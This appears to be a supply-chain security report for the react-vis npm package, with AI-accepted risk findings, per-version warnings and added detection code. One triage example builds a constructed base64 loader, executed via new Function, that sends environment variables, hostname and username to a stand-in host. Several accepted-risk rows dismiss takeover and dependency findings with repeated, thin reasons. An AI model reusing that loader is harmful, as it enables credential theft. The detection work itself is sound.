react-vis
Data visualization library based on React and d3.
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
Maintainers
Keywords
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| npm-metadata | suspicious-initial-version | AI (npm-metadata): react-vis 0.0.0 is the legitimate initial release of Uber's well-known data visualization library, not a throwaway malicious package. 87k weekly downloads and 3700+ day history confirm legitimacy. | ai | |
| publish-pattern | new-deps-added | AI (publish-pattern): d3-geo and d3-contour are official D3 packages; adding them to a D3-based visualization library is expected and benign. | ai | |
| maintainer-change | maintainer-added | AI (maintainer-change): New maintainers include uber-ospo, consistent with Uber's OSS governance transition. No malicious indicators. | ai | |
| provenance | publisher-changed | AI (provenance): Publisher kenns29 has strong track record (120 approved, 0 rejected, 3+ years). Change aligns with Uber OSS team transition. | ai | |
| maintainer-change | maintainer-removed | AI (maintainer-change): Removal of 'uber' account is part of the same organizational transition to uber-ospo and named maintainers. | ai | |
| maintainer-change | maintainer-takeover | AI (maintainer-change): Transition includes uber-ospo (Uber's OSPO), indicating an organized internal handoff. Publisher kenns29 has 120 approved packages and a 3+ year track record. Legitimate org transition. | ai | |
| phantom-deps | phantom-dep:d3-format | AI (phantom-deps): D3-format is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-sankey | AI (phantom-deps): D3-sankey is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-contour | AI (phantom-deps): D3-contour is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-hierarchy | AI (phantom-deps): D3-hierarchy is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-collection | AI (phantom-deps): D3-collection is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-interpolate | AI (phantom-deps): D3-interpolate is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:deep-equal | AI (phantom-deps): Deep-equal is a declared dependency used indirectly by react-vis; expected pattern for utility libraries. | ai | |
| phantom-deps | phantom-dep:global | AI (phantom-deps): Global is a declared dependency used indirectly by react-vis; expected pattern for polyfill/utility libraries. | ai | |
| phantom-deps | phantom-dep:prop-types | AI (phantom-deps): Prop-types is a declared dependency used indirectly by react-vis components; expected pattern for React libraries. | ai | |
| phantom-deps | phantom-dep:react-motion | AI (phantom-deps): React-motion is a declared dependency used indirectly by react-vis; expected pattern for animation libraries. | ai | |
| phantom-deps | phantom-dep:react-test-renderer | AI (phantom-deps): React-test-renderer is a declared dependency used indirectly by react-vis testing; expected pattern for test utilities. | ai | |
| phantom-deps | phantom-dep:d3-voronoi | AI (phantom-deps): D3-voronoi is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-geo | AI (phantom-deps): D3-geo is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-array | AI (phantom-deps): D3-array is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-color | AI (phantom-deps): D3-color is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-scale | AI (phantom-deps): D3-scale is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-shape | AI (phantom-deps): D3-shape is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| provenance | missing-githead | AI (provenance): Established package with 108 versions and clean publisher history; missing gitHead is a process gap, not a security indicator for this package. | ai | |
| provenance | no-provenance | AI (provenance): react-vis predates Sigstore provenance requirements; absence of attestation is expected for this long-running package. | ai | |
| phantom-deps | phantom-dep:hoek | AI (phantom-deps): hoek is explicitly declared as a runtime dependency in package.json at version 4.2.1; the phantom-dep finding is a false positive for this package. | ai | |
| source-diff | encoded-string-file:dist/dist.min.js | AI (source-diff): dist/dist.min.js is the documented browserify+uglifyjs browser bundle output for react-vis. Long encoded strings are standard minified d3/React bundle content, not obfuscation. | ai | |
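The phantom-dep rows above accept one package at a time with the same reason, so it is worth being precise about what the rule measures. "Phantom dependency" covers two directions: a module imported by shipped code but declared nowhere (it resolves only by hoisting accident, or breaks), and a runtime dependency declared but imported by nothing that ships (install-time attack surface for no benefit). The reasons given above all concern declared packages, so the rows appear to be the second kind. The following is an added example, not the report's scanner and not react-vis code: it compares a package.json against the import and require specifiers in the files that ship in the tarball and reports both directions. The package.json and files are constructed, and example-viz is a placeholder name.

```javascript
// Added example, not the report's scanner and not react-vis code: compare the
// dependencies a package.json declares with the bare import/require
// specifiers in the files that actually ship, and report both mismatches.
//   undeclared: imported but declared nowhere, so it resolves only if some
//               other package happens to hoist it (or not at all);
//   unused:     declared under "dependencies" but imported by nothing that
//               ships, so it is install-time attack surface for no benefit.
// The package.json and files below are constructed; example-viz is a
// placeholder name.

// Partial list; a real check would use require('module').builtinModules.
const NODE_BUILTINS = new Set(['fs', 'path', 'os', 'crypto', 'util', 'events',
  'stream', 'http', 'https', 'url', 'child_process', 'buffer', 'zlib']);

// The npm package behind a specifier: strips subpaths, keeps scopes, and
// returns null for relative/absolute paths and Node built-ins.
function specifierToPackage(spec) {
  if (spec.startsWith('.') || spec.startsWith('/') || spec.startsWith('node:')) return null;
  const parts = spec.split('/');
  const name = spec.startsWith('@') ? parts.slice(0, 2).join('/') : parts[0];
  return NODE_BUILTINS.has(name) ? null : name;
}

const SPECIFIER_PATTERNS = [
  /\brequire\s*\(\s*['"]([^'"]+)['"]\s*\)/g,            // require('x')
  /\bimport\s*\(\s*['"]([^'"]+)['"]\s*\)/g,             // import('x')
  /\bimport\s*(?:[^'"]*?\bfrom\s*)?['"]([^'"]+)['"]/g,  // import x from 'x', import 'x'
  /\bexport\s*[^'"]*?\bfrom\s*['"]([^'"]+)['"]/g,        // export { x } from 'x'
];

// Set of npm packages imported anywhere in { path: source } files.
function importedPackages(files) {
  const found = new Set();
  for (const source of Object.values(files)) {
    for (const re of SPECIFIER_PATTERNS) {
      for (const m of source.matchAll(re)) {
        const pkg = specifierToPackage(m[1]);
        if (pkg) found.add(pkg);
      }
    }
  }
  return found;
}

function phantomDeps(pkgJson, files) {
  const runtime = new Set(Object.keys(pkgJson.dependencies || {}));
  // Peer and optional deps satisfy an import without being this package's
  // install-time responsibility; a package may also import itself by name.
  const satisfiable = new Set([
    ...runtime,
    ...Object.keys(pkgJson.peerDependencies || {}),
    ...Object.keys(pkgJson.optionalDependencies || {}),
    pkgJson.name,
  ]);
  const imported = importedPackages(files);
  return {
    undeclared: [...imported].filter((p) => !satisfiable.has(p)).sort(),
    unused: [...runtime].filter((p) => !imported.has(p)).sort(),
  };
}

// Constructed sample: a test renderer declared as a runtime dependency, a
// lodash module used without being declared, and the usual noise of
// relative paths, built-ins and subpath imports.
const SAMPLE_PACKAGE_JSON = {
  name: 'example-viz',
  dependencies: { 'd3-scale': '^4.0.0', 'd3-shape': '^3.0.0', 'prop-types': '^15.8.0', 'react-test-renderer': '^18.0.0' },
  peerDependencies: { react: '>=16' },
};
const SAMPLE_FILES = {
  'dist/index.js': [
    "import { scaleLinear } from 'd3-scale';",
    "import { line } from 'd3-shape/src/line';",
    "import React from 'react';",
    "import PropTypes from 'prop-types';",
    "const debounce = require('lodash.debounce');",
    "const helpers = require('./helpers');",
    "const { join } = require('node:path');",
    "export { Chart } from './chart';",
  ].join('\n'),
  'dist/helpers.js': "const fs = require('fs');\nmodule.exports = { read: (p) => fs.readFileSync(p, 'utf8') };",
};

console.log(phantomDeps(SAMPLE_PACKAGE_JSON, SAMPLE_FILES));
```

Run it over the unpacked tarball (`npm pack <name>@<version>`, then extract), not a git checkout: the finding is about what ships, and a dependency that only tests use is "unused" in exactly the way react-test-renderer is declared above. The regexes are a heuristic, not a parser; a bundle that builds module names at runtime will escape them, which is itself worth a look.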
Versions (showing 51 of 101)
| Version | Deps | Published |
|---|---|---|
| 1.12.1 | 17 / 34 | |
| 1.12.0 | 17 / 34 | |
| 1.11.12 | 18 / 33 | |
| 1.11.11 | 17 / 33 | |
| 1.11.10 | 17 / 33 | |
| 1.11.8 | 17 / 33 | |
| 1.11.7 | 18 / 33 | |
| 1.11.6 | 18 / 33 | |
| 1.11.5 | 18 / 33 | |
| 1.11.4 | 18 / 32 | |
| 1.11.3 | 18 / 32 | |
| 1.11.2 | 18 / 32 | |
| 1.11.1 | 18 / 29 | |
| 1.11.0 | 18 / 29 | |
| 1.10.8 | 18 / 29 | |
| 1.10.7 | 17 / 29 | |
| 1.10.6 | 17 / 29 | |
| 1.10.5 | 17 / 29 | |
| 1.10.4 | 17 / 29 | |
| 1.10.3 | 17 / 29 | |
| 1.10.2 | 17 / 29 | |
| 1.10.1 | 17 / 28 | |
| 1.10.0 | 17 / 28 | |
| 1.9.4 | 16 / 29 | |
| 1.9.3 | 16 / 29 | |
| 1.9.2 | 16 / 28 | |
| 1.9.1 | 16 / 28 | |
| 1.9.0 | 16 / 28 | |
| 1.8.3 | 16 / 28 | |
| 1.8.2 | 16 / 28 | |
| 1.8.1 | 16 / 28 | |
| 1.8.0 | 16 / 28 | |
| 1.7.10 | 16 / 28 | |
| 1.7.9 | 17 / 27 | |
| 1.7.8 | 17 / 27 | |
| 1.7.7 | 17 / 27 | |
| 1.7.6 | 17 / 27 | |
| 1.7.5 | 18 / 26 | |
| 1.7.4 | 18 / 26 | |
| 1.7.3 | 18 / 26 | |
| 1.7.2 | 17 / 26 | |
| 1.7.1 | 17 / 26 | |
| 1.7.0 | 17 / 26 | |
| 1.6.7 | 17 / 26 | |
| 1.6.6 | 17 / 26 | |
| 1.6.5 | 17 / 26 | |
| 1.6.4 | 17 / 26 | |
| 1.6.3 | 17 / 26 | |
| 1.6.2 | 17 / 26 | |
| 1.6.1 | 16 / 26 | |
| 1.6.0 | 16 / 26 | |
v1.12.1
1 finding:
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.12.0
2 findings:
This version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: kenns29.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.11.12
2 findings:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: kenns29.
v1.11.11
2 findings:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: kenns29.
v1.11.10
4 findings:
All previous maintainers (uber) were replaced by new maintainers (kenns29, shengs, emrahs, zacklk, uber-ospo). This is a strong signal of a potential package hijack and requires careful review.
This version was published by a different npm account than previous versions on 2023-01-07. This could indicate a legitimate maintainer transition or an account compromise.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: kenns29.
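The gitHead, publisher and maintainer findings for v1.11.10, and the provenance gap the page opens with, can all be reproduced from registry metadata alone, which is what lets a reviewer confirm that "organizational transition" is the right reading rather than take it on trust. The following is an added example, not the report's tooling and not react-vis code: it walks an npm packument (the JSON that GET https://registry.npmjs.org/<name> returns) in publish order and raises the same four signals. The packument is constructed; example-viz, org-account, new-dev and ospo-team are placeholders, not real packages or accounts.

```javascript
// Added example, not the report's own tooling and not react-vis code: replay
// the publish-environment checks behind the v1.11.10 findings against an npm
// packument, the JSON that GET https://registry.npmjs.org/<name> returns.
// The packument below is constructed; example-viz, org-account, new-dev and
// ospo-team are placeholders, not real packages or accounts.

const PACKUMENT = {
  name: 'example-viz',
  time: {
    created: '2022-06-01T00:00:00.000Z',
    modified: '2023-02-01T00:00:00.000Z',
    '1.0.0': '2022-06-01T00:00:00.000Z',
    '1.1.0': '2022-09-01T00:00:00.000Z',
    '1.2.0': '2023-01-07T00:00:00.000Z',
    '1.2.1': '2023-02-01T00:00:00.000Z',
  },
  versions: {
    // Built and published by CI with a Sigstore attestation and a gitHead.
    '1.0.0': {
      gitHead: '0f2a9c1d8e7b6a5f4c3d2e1f0a9b8c7d6e5f4a3b',
      _npmUser: { name: 'org-account' },
      maintainers: [{ name: 'org-account' }],
      dist: {
        integrity: 'sha512-constructed',
        attestations: {
          url: 'https://registry.npmjs.org/-/npm/v1/attestations/example-viz@1.0.0',
          provenance: { predicateType: 'https://slsa.dev/provenance/v1' },
        },
      },
    },
    // Published from a workstation: still a gitHead, but no attestation.
    '1.1.0': {
      gitHead: '7d41e0b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8',
      _npmUser: { name: 'org-account' },
      maintainers: [{ name: 'org-account' }],
      dist: { integrity: 'sha512-constructed' },
    },
    // New publisher, org account gone, no record of the source commit.
    '1.2.0': { _npmUser: { name: 'new-dev' }, maintainers: [{ name: 'new-dev' }, { name: 'ospo-team' }], dist: { integrity: 'sha512-constructed' } },
    '1.2.1': { _npmUser: { name: 'new-dev' }, maintainers: [{ name: 'new-dev' }, { name: 'ospo-team' }], dist: { integrity: 'sha512-constructed' } },
  },
};

// Versions in the order the registry says they were published. Publish time,
// not semver, defines "previous": a backported patch can be the newest publish.
function publishOrder(pkg) {
  return Object.keys(pkg.versions).sort((a, b) => Date.parse(pkg.time[a]) - Date.parse(pkg.time[b]));
}

function maintainerNames(manifest) {
  return new Set((manifest.maintainers || []).map((m) => m.name));
}

// Findings for one version, judged against the version published before it.
function checkVersion(pkg, version, previous) {
  const cur = pkg.versions[version];
  const prev = previous ? pkg.versions[previous] : null;
  const findings = [];
  const att = cur.dist && cur.dist.attestations;
  if (!(att && att.provenance)) {
    findings.push({ rule: 'no-provenance', detail: 'no Sigstore attestation in dist.attestations' });
  }
  if (!prev) return findings; // nothing to diff for the first publish
  if (prev.gitHead && !cur.gitHead) {
    findings.push({ rule: 'missing-githead', detail: `${previous} recorded ${prev.gitHead}, ${version} records none` });
  }
  if (prev._npmUser && cur._npmUser && prev._npmUser.name !== cur._npmUser.name) {
    findings.push({ rule: 'publisher-changed', detail: `${prev._npmUser.name} -> ${cur._npmUser.name} on ${pkg.time[version].slice(0, 10)}` });
  }
  const before = maintainerNames(prev);
  const after = maintainerNames(cur);
  const added = [...after].filter((n) => !before.has(n));
  const removed = [...before].filter((n) => !after.has(n));
  if (added.length) findings.push({ rule: 'maintainer-added', detail: added.join(', ') });
  if (removed.length) findings.push({ rule: 'maintainer-removed', detail: removed.join(', ') });
  // Every previous maintainer gone at once is the hijack shape; a planned
  // handoff normally keeps at least one overlapping account for a while.
  if (before.size > 0 && removed.length === before.size) {
    findings.push({ rule: 'maintainer-takeover', detail: `[${[...before].join(', ')}] replaced by [${[...after].join(', ')}]` });
  }
  return findings;
}

// { version: [findings] } over the whole publish history.
function auditPackument(pkg) {
  const order = publishOrder(pkg);
  const report = {};
  order.forEach((v, i) => { report[v] = checkVersion(pkg, v, i > 0 ? order[i - 1] : null); });
  return report;
}

function rulesFor(pkg, version) {
  return auditPackument(pkg)[version].map((f) => f.rule);
}

for (const [version, findings] of Object.entries(auditPackument(PACKUMENT))) {
  console.log(`${version}: ${findings.length} finding(s)`);
  for (const f of findings) console.log(`  ${f.rule}: ${f.detail}`);
}
```

The fields used (`time`, per-version `gitHead`, `_npmUser`, `maintainers` and `dist.attestations`) are what the public registry serves in the full packument, so the same code runs on real data after `curl https://registry.npmjs.org/react-vis`. Note what the example cannot do: a missing gitHead and a missing attestation say the tarball is unverifiable, not that it is malicious; only a provenance attestation, checked with `npm audit signatures` against an installed tree, turns "published by a trusted account" into "built from this commit by this workflow". That is the gap the page's opening line is about.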
v1.11.8
2 findings:
This version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: kenns29.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.11.7
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.11.6
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.11.5
2 findings:
Modified file contains 4 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
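The encoded-string finding above fires on length alone, and the accepted-risk entry for dist/dist.min.js explains it away as bundle output. A reviewer can do better than either by decoding the literal and looking at what surrounds it: a data: URI that declares a source map or a font is what a bundler emits, whereas base64 that decodes to JavaScript and is handed to `new Function` is the stage-one loader shape. The following is an added example, not the scanner that raised the finding and not react-vis code, of that triage. Both sample inputs are constructed; collector.example.invalid uses the reserved .invalid TLD and never resolves, and the payload string is only ever treated as data.

```javascript
// Added example, not the scanner that produced the finding above and not
// react-vis code: locate long string literals in a JavaScript file, decode the
// ones that are base64, hex or base64 data: URIs, and triage them by what the
// bytes contain and what the surrounding statement does with them.
// All sample inputs are constructed.

const MIN_LEN = 200;
const BASE64_RE = /^[A-Za-z0-9+/]+={0,2}$/;
const HEX_RE = /^[0-9a-fA-F]+$/;
// Decoded text containing these is code, not data.
const CODE_MARKERS = /\b(require|child_process|process\.env|XMLHttpRequest|fetch|eval)\b|\bnew\s+Function\b/;
// Statement context that executes a string.
const EVAL_SINK_RE = /\b(eval|Function)\s*\(|\bnew\s+Function\s*\(/;

// Every single- or double-quoted literal of at least minLen characters, with
// the offset of its opening quote so the surrounding statement can be read.
function longStringLiterals(source, minLen = MIN_LEN) {
  const re = /(['"])((?:\\.|(?!\1)[^\\\n])*)\1/g;
  const out = [];
  for (const m of source.matchAll(re)) {
    if (m[2].length >= minLen) out.push({ value: m[2], offset: m.index });
  }
  return out;
}

// Hex is checked before base64 because every even-length hex string is also
// valid base64; returns null when the literal is none of the three.
function decodeIfEncoded(value) {
  const dataUri = value.match(/^data:([^;,]+);base64,(.*)$/);
  if (dataUri) return { encoding: 'base64', mediaType: dataUri[1], bytes: Buffer.from(dataUri[2], 'base64') };
  if (value.length % 2 === 0 && HEX_RE.test(value)) return { encoding: 'hex', mediaType: null, bytes: Buffer.from(value, 'hex') };
  if (value.length % 4 === 0 && BASE64_RE.test(value)) return { encoding: 'base64', mediaType: null, bytes: Buffer.from(value, 'base64') };
  return null;
}

function printableRatio(bytes) {
  let n = 0;
  for (const b of bytes) if ((b >= 0x20 && b < 0x7f) || b === 0x0a || b === 0x0d || b === 0x09) n++;
  return bytes.length ? n / bytes.length : 0;
}

function triageLiteral(source, lit) {
  const decoded = decodeIfEncoded(lit.value);
  if (!decoded) return { verdict: 'plain', reason: 'long literal but not base64, hex or a data: URI' };
  // Context is 200 characters on each side of the literal, excluding it.
  const before = source.slice(Math.max(0, lit.offset - 200), lit.offset);
  const end = lit.offset + lit.value.length + 2;
  const context = before + ' ' + source.slice(end, end + 200);
  const nearSink = EVAL_SINK_RE.test(context);
  const ratio = printableRatio(decoded.bytes);
  const looksLikeCode = ratio > 0.95 && CODE_MARKERS.test(decoded.bytes.toString('utf8'));
  if (looksLikeCode && nearSink) return { verdict: 'malicious-pattern', reason: 'decodes to code and is passed to eval/Function' };
  if (looksLikeCode) return { verdict: 'suspicious', reason: 'decodes to code-like text' };
  if (nearSink) return { verdict: 'suspicious', reason: 'decoded value sits next to an eval/Function sink' };
  if (decoded.mediaType) return { verdict: 'benign', reason: `data: URI declaring ${decoded.mediaType}` };
  return { verdict: 'benign', reason: ratio > 0.95 ? 'decodes to text with no code markers' : 'decodes to binary (font, image or compressed data)' };
}

function scanSource(source) {
  return longStringLiterals(source).map((lit) => ({ offset: lit.offset, length: lit.value.length, ...triageLiteral(source, lit) }));
}

// Sample 1 (constructed): a minified bundle with an inline source map and a
// long plain-text string, the shape that trips a length-only heuristic.
const SOURCE_MAP = JSON.stringify({ version: 3, sources: ['src/chart.js'], names: [], mappings: 'AAAA,'.repeat(60) });
const BENIGN_BUNDLE = `!function(){var m="data:application/json;base64,${Buffer.from(SOURCE_MAP).toString('base64')}";` +
  `var t="${'chart legend placeholder text '.repeat(10)}";}();`;

// Sample 2 (constructed, .invalid never resolves): a stage-one loader that
// decodes a blob and executes it. PAYLOAD is data here and is never run.
const PAYLOAD = 'const os=require("os"),h=require("https");h.request({host:"collector.example.invalid",' +
  'path:"/b/"+os.hostname()+"/"+os.userInfo().username,method:"POST"}).end(JSON.stringify(process.env));';
const LOADER_SAMPLE = `var p="${Buffer.from(PAYLOAD).toString('base64')}";new Function(Buffer.from(p,"base64").toString())();`;

for (const [name, src] of [['benign bundle', BENIGN_BUNDLE], ['loader', LOADER_SAMPLE]]) {
  for (const hit of scanSource(src)) console.log(`${name} @${hit.offset} (${hit.length} chars): ${hit.verdict} - ${hit.reason}`);
}
```

The pairing is what carries the signal, not either half alone: long base64 in a bundle is normal, and `new Function` appears in legitimate polyfills, but a literal that decodes to code and flows into a sink within the same statement is worth a block. Run it over the files from `npm pack react-vis@1.11.5` rather than the repository, since a compromised publish differs from the source exactly in what ships.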
v1.11.4
2 findings:
Modified file contains 4 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.11.3
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.11.2
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.11.1
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.11.0
2 findings:
Modified file contains 4 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.8
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.7
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.6
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.5
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.4
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.3
2 findings:
Modified file contains 4 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.2
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.1
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.0
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.9.4
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.9.3
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.9.2
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.9.1
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.9.0
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.8.3
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.8.2
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.8.1
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.8.0
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.10
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.9
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.8
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.7
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.6
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.5
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.4
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.3
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.2
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.1
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.0
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.6.7
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.6.6
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.6.5
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.6.4
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.6.3
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.6.2
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.6.1
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.6.0
1 finding:
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.